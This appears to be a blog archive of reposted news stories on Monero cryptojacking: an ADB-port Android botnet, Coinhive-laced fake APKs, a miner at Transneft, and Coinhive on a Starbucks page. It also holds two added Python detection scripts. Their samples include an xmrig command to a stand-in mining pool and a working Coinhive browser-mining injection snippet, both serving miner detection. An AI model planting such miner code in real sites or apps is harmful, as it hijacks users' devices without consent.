Showing posts with label Monero.

Tuesday, 6 February 2018

New Monero Crypto-Mining Botnet Leverages Android Debugging Tool

A new botnet that distributes malware for mining Monero cryptocurrency has emerged, infecting Android devices through a port linked with a debugging tool for the OS, according to researchers at Qihoo 360 Netlab.
Dubbed ADB.Miner by 360 Netlab, the botnet is gaining entry to Android devices, mostly smartphones and TV boxes, through TCP port 5555, the port used by Android Debug Bridge (ADB), a command-line tool for debugging, installing apps and other development tasks.
ADB normally talks to a device over USB, but the on-device daemon (adbd) can also be switched to listen on TCP port 5555 (for example with `adb tcpip 5555`), as the Android documentation describes; a device left in that state with ADB authorization disabled will accept a debugging session from anyone who can reach the port. The botnet propagates in worm-like fashion, scanning other hosts for an open port 5555, most of which turn out to be Android devices, 360 Netlab researcher Hui Wang said in a blog post.
Notably, it reuses port-scanning code from the Mirai botnet, the first time Mirai code has been seen targeting Android devices, he claimed. Mirai, which emerged in August 2016, has historically attacked Linux-based IoT devices.
Most of the Android devices being targeted by ADB.Miner are located in China and South Korea, but 360 Netlab is not identifying any of them at this time.
“Overall, we think there is a new and active worm targeting android system’s adb debug interface spreading, and this worm has probably infected more than 5,000 devices in just 24 hours,” Wang wrote. Scanning traffic aimed at port 5555 has, in fact, entered the top 10 in 360 Netlab’s own scan data.
The botnet is distributing malicious code that mines Monero, but as yet no mined coins have been paid out, according to Wang.
Cybercriminals have been increasingly turning to cryptocurrency mining via botnets, with Monero a favored target. Those behind the massive Smominru botnet have generated as much as $3.6 million since May through an army of more than 500,000 infected machines, according to Proofpoint.
Crypto mining botnets have clear advantages over other types of attacks, such as ransomware, since they don’t necessarily require social engineering and by their nature are meant to operate stealthily, stealing nothing from victims but CPU cycles. In fact, crypto miners may be the “new payload of choice” for cybercriminals, researchers at Cisco Talos said recently.

Monday, 8 January 2018

Fake Android apps caught dropping Coinhive miner

By Wagas on 07/01/2018 on the HackRead website



In October last year, three Android apps on the Play Store were found carrying the Coinhive cryptocurrency miner, which mines Monero. Now security researcher Elliot Alderson has found fake Android apps bundled with the Coinhive miner, built specifically to use the CPU power of the device they are installed on.

Fake App Real Miner

According to Alderson, whose real name is Robert Baptiste, the apps are offered on a third-party website that claims to provide free APKs (Android application packages); in reality the APKs ship with the Coinhive miner built in.
“I don’t think these apps are the original apps. The ‘hacker’ modified it and repacked it and after that, he uses multiple dropper apps to distribute these modified apps. Only the package name and the app name has been changed and I just dig up more and in fact, this is the same app 291 times which means there are 291 applications with different icons and names,” Baptiste told HackRead.
Scanning some of the APK files offered on the site with VirusTotal confirmed that they contained the Coinhive miner. Covert use of any cryptocurrency miner is treated as malware: last year Cloudflare booted off one of its customers for secretly running the Coinhive miner without letting site visitors opt out or disable the code.
VirusTotal scan result
Found hundreds of infected apps with a miner:
http://

Coinhive miner code: 
http:// 3761e8ea2793f38d26b7e75ce3c 
 …

Dropper app: 
http://www. 9094c12f285cb37de8c29075bc1b784ef4c9aa6b4cd399fbf58cd1163/detection 
 …

VT score: 2/61


A look at the scam website (androidapk.world) hosting these malicious apps shows that it has been fully indexed by Google without raising any suspicion. The site also claims to offer APKs for top apps including Super Mario Run, Netflix, Mobile Strike, Clash of Clans and others.
Screenshot via Elliot Alderson
Moreover, the site was registered in March last year, and since then its download counter shows some APK files being downloaded millions of times. It is unclear whether the counter displays real figures or whether the operators inflate the numbers by hand to pose as an active, trustworthy APK download site.

Android Users Be Vigilant

Until now, the main victims of cryptocurrency miners were website owners and unsuspecting visitors. Now Android users are also at risk. In the past, cybercriminals preferred conventional malware attacks, but since the price of Bitcoin surged there has been an increase in attacks involving cryptocurrency miners.
Android users should be aware of the situation and:
Avoid downloading unnecessary apps from Play Store as well as third-party sites.
Keep your devices updated
Scan the device with reputable anti-malware software
Keep an eye on your phone's CPU usage

Users On PCs

Those on computers should also be aware of the situation and can use Whoismining to check whether a site they are about to visit is secretly mining cryptocurrency. There are also two Chrome extensions, No Coin and minerBlock, developed to block crypto miners from using your computing power.

About Elliot Alderson

Elliot Alderson is the same security researcher who in November last year found two pre-installed backdoor apps on the OnePlus 5, 3 and 3T that would allow attackers to spy on users and steal their personal data.

Monday, 18 December 2017

Monero Mining Software Found on Oil Transport Company’s Systems

By David Bisson on 18/12/2017 on the website The State of Security


An oil transportation company has discovered that someone installed Monero-mining software on its systems without authorization.
On 14 December, Vladimir Rushailo, vice president of the Russian state-owned transport monopoly Transneft, revealed that one of the company’s computers had automatically downloaded software designed to mine the Bitcoin rival. As quoted in a statement provided to Reuters:
Incidents where the company’s hardware was used to manufacture cryptocurrency have been found. It could have a negative impact on the productivity of our processing capacity.
The company subsequently deleted the program from the computer and implemented “programs to block such downloads in the future.”
Transneft has not said what caused the computer to download the miner, including whether a malicious insider or an external attacker compromised the workstation. What is clear is that incidents of this kind are growing in frequency. Pavel Lutsik, head of information security projects at the IT firm Croc, agrees:
More and more people have learn[ed] that, in fact, they do not even need to stand up from the sofa to make money – if they are not caught.
Transneft logo. (Source: Twitter)
In recent months, several organizations, including the Ultimate Fighting Championship and Showtime, have removed Coinhive and other Monero miners that slowed down visitors’ computers from their websites. Attackers have also gone after companies’ internal networks directly in order to mine cryptocurrency. F5 threat researchers detected one such campaign, dubbed “Zealot”, that exploits the Apache Struts Jakarta Multipart Parser vulnerability (CVE-2017-5638) and a flaw in the DotNetNuke (DNN) content management system to compromise exposed servers. It then uses the EternalBlue and EternalSynergy exploits, which target the same Microsoft SMB flaws (MS17-010) abused by WannaCry and NotPetya, to move laterally inside the network, find Windows and Linux computers, and turn them into Monero miners.
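The article says nothing about how Transneft found the miner. As an added example (not code from Transneft, Tripwire, F5 or Proofpoint), here is the host-side triage a responder would run over `ps` and `ss` output, flagging processes by the traits Monero miners reliably expose: a stratum pool URL or XMRig-style options on the command line, a 95-character Monero payout address, a CryptoNight/RandomX algorithm name, a hot process running from a temp or hidden directory, and an established connection to a port public pools commonly use. The pool-port list, CPU threshold and directory patterns are heuristics I chose, and the sample lines are constructed, not captured from a real incident.

```python
"""Flag likely cryptominer processes from `ps` and `ss` output.

Added example (not from Transneft, Tripwire, F5 or Proofpoint). Every hit
carries the reasons that triggered it, because the port list and the CPU
threshold are heuristics a human has to weigh. Sample lines are constructed.
"""
import re
from typing import Optional

STRATUM = re.compile(r"stratum\+(?:tcp|ssl)://[^\s'\"]+", re.I)
MINER_FLAGS = re.compile(r"(?:^|\s)--(?:donate-level|algo|coin|cpu-priority|max-cpu-usage|nicehash)\b")
# Standard Monero addresses: 95 base58 characters starting with 4 (8 for subaddresses)
B58 = "1-9A-HJ-NP-Za-km-z"
XMR_ADDRESS = re.compile(rf"(?<![{B58}])[48][{B58}]{{94}}(?![{B58}])")
ALGO = re.compile(r"\b(?:cryptonight|cn/[a-z0-9-]+|randomx|rx/[a-z0-9]+)\b", re.I)
TMP_EXEC = re.compile(r"^(?:/tmp|/var/tmp|/dev/shm)/|/\.[^/\s]+/")   # temp or dot-directory
POOL_PORTS = {3333, 4444, 5555, 7777, 8888, 9999, 14444, 45700}       # heuristic, not exhaustive
CPU_HOT = 80.0

# Line shapes of `ps -eo pid,user,pcpu,args --no-headers` and `ss -tnp`
PS_LINE = re.compile(r"^\s*(?P<pid>\d+)\s+(?P<user>\S+)\s+(?P<cpu>[\d.]+)\s+(?P<args>.*)$")
SS_LINE = re.compile(r'^(?P<state>\S+)\s+\d+\s+\d+\s+\S+\s+(?P<peer>\S+):(?P<port>\d+)\s+'
                     r'users:\(\("(?P<comm>[^"]+)",pid=(?P<pid>\d+)')


def flag_process(line: str) -> Optional[dict]:
    """Return {'pid', 'user', 'reasons'} for one ps line, or None if nothing matched."""
    m = PS_LINE.match(line)
    if not m:
        return None
    args, reasons = m["args"], []
    exe = args.split(None, 1)[0] if args.strip() else ""
    if STRATUM.search(args):
        reasons.append("stratum pool URL on command line")
    if MINER_FLAGS.search(args):
        reasons.append("XMRig-style option on command line")
    if XMR_ADDRESS.search(args):
        reasons.append("Monero payout address on command line")
    if ALGO.search(args):
        reasons.append("CryptoNight/RandomX algorithm named")
    if float(m["cpu"]) >= CPU_HOT and TMP_EXEC.search(exe):
        reasons.append(f"{m['cpu']}% CPU from temp/hidden path {exe}")
    if not reasons:
        return None
    return {"pid": int(m["pid"]), "user": m["user"], "reasons": reasons}


def flag_connection(line: str) -> Optional[dict]:
    """Return a hit for an established connection to a pool-style port, else None."""
    m = SS_LINE.match(line)
    if not m or m["state"] != "ESTAB" or int(m["port"]) not in POOL_PORTS:
        return None
    return {"pid": int(m["pid"]), "comm": m["comm"],
            "reasons": [f"established connection to {m['peer']}:{m['port']} (pool-style port)"]}


def analyze(ps_lines, ss_lines) -> list:
    """Merge process and connection hits by PID; returns a list sorted by PID."""
    found = {}
    for hit in filter(None, map(flag_process, ps_lines)):
        found.setdefault(hit["pid"], {"pid": hit["pid"], "reasons": []})["reasons"] += hit["reasons"]
    for hit in filter(None, map(flag_connection, ss_lines)):
        found.setdefault(hit["pid"], {"pid": hit["pid"], "reasons": []})["reasons"] += hit["reasons"]
    return [found[pid] for pid in sorted(found)]


# Constructed sample data (not a real wallet, host or capture)
XMR = "4" + "AbCd" * 23 + "Ab"   # 95 base58 characters, placeholder only
SAMPLE_PS = [
    f" 2134 www-data 97.3 /tmp/.x/xmrig -o stratum+tcp://pool.example.net:3333 -u {XMR} -p x --donate-level 1",
    "  905 root      0.1 /usr/sbin/sshd -D",
    " 1422 postgres  4.2 postgres: checkpointer",
    " 2402 www-data 99.0 /var/tmp/kworkerds --algo cryptonight -o 203.0.113.10:5555",
    " 2510 deploy   88.0 /opt/app/bin/encoder --preset slow video.mp4",   # busy but legitimate
]
SAMPLE_SS = [
    'ESTAB 0 0 10.0.0.5:51234 203.0.113.10:5555 users:(("kworkerds",pid=2402,fd=4))',
    'ESTAB 0 0 10.0.0.5:51240 198.51.100.7:443 users:(("curl",pid=2510,fd=3))',
    'ESTAB 0 0 10.0.0.5:51301 192.0.2.55:3333 users:(("xmrig",pid=2134,fd=5))',
]

if __name__ == "__main__":
    for hit in analyze(SAMPLE_PS, SAMPLE_SS):
        print(hit["pid"], "; ".join(hit["reasons"]))
```

On a live host feed it `ps -eo pid,user,pcpu,args --no-headers` and `ss -tnp`; the busy-but-legitimate encoder in the sample is left alone because high CPU on its own is never a reason, only CPU combined with a temp or hidden path. Note that 5555 appears both here and in the ADB.Miner story above: a single port match is the weakest reason in the list.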
Attackers victimized 1.65 million users with cryptocurrency miners in the first eight months of 2017, and that number will no doubt rise once the rest of the year is counted.
As reported by RT, Russia intends to pass legislation governing cryptocurrency mining and related matters by July 2018. This will help the state crack down on mining attacks, especially those involving Russian corporate servers.
At the same time, organizations can protect themselves against cryptocurrency miners by keeping their computers up to date. To do so, they should build a patch management program that, among other things, gives them complete visibility over all their assets and prioritizes known vulnerabilities based on their business requirements. For information on how Tripwire can help your organization build such a program, click here.

Monday, 11 December 2017

In-Store WiFi Provider Used Starbucks Website to Generate Monero Coins

By Wagas on 11/12/2017 on the HackRead website

The value of Bitcoin is rising so fast that buying in is becoming almost impossible for most people, which is why users are turning to investing in or mining other currencies, including Monero, which at the time of writing traded at around USD 265.

Starbucks And CoinHive Code

On December 2nd, Twitter user Noah Dinkin posted a screenshot showing that the Argentine rewards site of coffee giant Starbucks was loading Coinhive’s code to generate Monero using the CPU power of the site’s visitors, in this case Starbucks’ customers.
In his tweet, Dinkin suggested that the company’s in-store Wi-Fi provider was behind the scheme. Over the past few months, however, cybercriminals have also been hacking websites to plant Coinhive code covertly; just days earlier, researchers identified more than 5,000 sites hijacked to insert Coinhive code, so whether Starbucks itself was involved remains unclear.
“Hi, @Starbucks @StarbucksAr did you know that your in-store wifi provider in Buenos Aires forces a 10-second delay when you first connect to the wifi so it can mine bitcoin using a customer’s laptop? Feels a little off-brand.. cc @GMFlickinger,” the tweet said.
Image credit: @imnoah/Twitter
Starbucks is known for providing free Wi-Fi to its customers, and its rewards program lets customers earn stars based on how much they spend at Starbucks. Little did the Argentine customers know that the CPU power of their devices was being used to generate Monero.
So far there has been no response from Starbucks, but for customers the lesson is that there is no such thing as “free Wi-Fi.”

How Does CoinHive Work

For those unfamiliar with Coinhive: it is a company that provides a cryptocurrency miner written in JavaScript; coins mined in a visitor’s browser are credited to the account that owns the site key, normally the website owner. Previously, The Pirate Bay and CBS’s Showtime websites were also caught using the code to generate Monero.
The common assumption is that once a visitor closes a website running a cryptocurrency miner, the mining stops. Researchers recently found, however, that a great many sites keep using the visitor’s CPU even after the tab is closed, typically through a pop-under window hidden behind the taskbar.
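The repackaged APKs in the HackRead story above and the Starbucks rewards page are two forms of the same artifact: Coinhive’s JavaScript plus the site key that decides who gets paid. As an added example (not code from Coinhive, HackRead or any of the researchers quoted), the scanner below looks for the documented loader URL, the constructor call and the site key, either across an APK’s entries or in a fetched page. The indicator patterns are mine, the sample APK is constructed in memory and the site key in it is a placeholder; obfuscated or self-hosted copies of the library will slip past a string scan, so treat a clean result as weak evidence (the fakes above scored only 2/61 on VirusTotal).

```python
"""Static scan for Coinhive indicators in an APK or a web page.

Added example (not from Coinhive, HackRead or the researchers quoted).
Indicators: the Coinhive loader URL, the opt-in authedmine.com variant, the
WebSocket proxy endpoint, and the CoinHive.Anonymous()/User()/Token()
constructors that carry the site key. Sample APK below is constructed.
"""
import io
import re
import zipfile

INDICATORS = {
    "coinhive-loader": re.compile(rb"coinhive\.com/lib/coinhive(?:\.min)?\.js", re.I),
    "authedmine-loader": re.compile(rb"authedmine\.com/lib/", re.I),
    "coinhive-proxy": re.compile(rb"wss?://[a-z0-9.-]*coinhive\.com/proxy", re.I),
    "coinhive-constructor": re.compile(rb"CoinHive\.(?:Anonymous|User|Token)\s*\("),
}
# Site key passed as the first constructor argument (Coinhive keys were typically 32 chars)
SITE_KEY = re.compile(rb"CoinHive\.(?:Anonymous|User|Token)\s*\(\s*['\"]([A-Za-z0-9]{16,64})['\"]")


def find_indicators(data: bytes) -> dict:
    """Return {'indicators': [...names...], 'site_keys': [...]} for one blob of bytes."""
    hits = [name for name, rx in INDICATORS.items() if rx.search(data)]
    keys = sorted({m.group(1).decode() for m in SITE_KEY.finditer(data)})
    return {"indicators": hits, "site_keys": keys}


def scan_apk(apk: bytes) -> list:
    """Walk every entry of the APK (a zip). Dex string tables are plain bytes,
    so classes.dex gets the same regexes as assets and resources."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(apk)) as zf:
        for info in zf.infolist():
            if info.is_dir():
                continue
            result = find_indicators(zf.read(info))
            if result["indicators"]:
                findings.append((info.filename, result))
    return findings


def scan_html(page: str) -> dict:
    """Same check for a fetched page, e.g. the rewards portal in the story above."""
    return find_indicators(page.encode("utf-8", "replace"))


def build_sample_apk(infected: bool) -> bytes:
    """Constructed stand-in for a repackaged APK (not a real sample)."""
    key = "a" * 32   # placeholder site key, not a real Coinhive account
    miner_page = (
        "<script src='https://coinhive.com/lib/coinhive.min.js'></script>\n"
        f"<script>var m=new CoinHive.Anonymous('{key}',{{throttle:0.3}});m.start();</script>\n"
    )
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("AndroidManifest.xml", b"\x03\x00\x08\x00 placeholder binary XML")
        zf.writestr("classes.dex", b"dex\n035\x00 ... android/webkit/WebView ... ")
        zf.writestr("assets/index.html", miner_page if infected else "<h1>Game</h1>")
    return buf.getvalue()


if __name__ == "__main__":
    for name, result in scan_apk(build_sample_apk(infected=True)):
        print(name, result)
```

The site key matters more than the detection itself: it is the pivot that links repackaged apps or hijacked sites to the same account, which is how 291 differently named APKs can be shown to pay one operator.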

Cloudflare Not Cool With Secret Miners

According to Cloudflare, running cryptocurrency mining code without informing users and without giving them a way to opt out counts as malware. To underline the point, the company booted off one of its customers for secretly running a miner.

“Multiple domains in your account were injecting Coinhive mining code without notifying users. … We consider this to be malware, and as such, the account was suspended, and all domains removed from Cloudflare,” Cloudflare told the customer in October.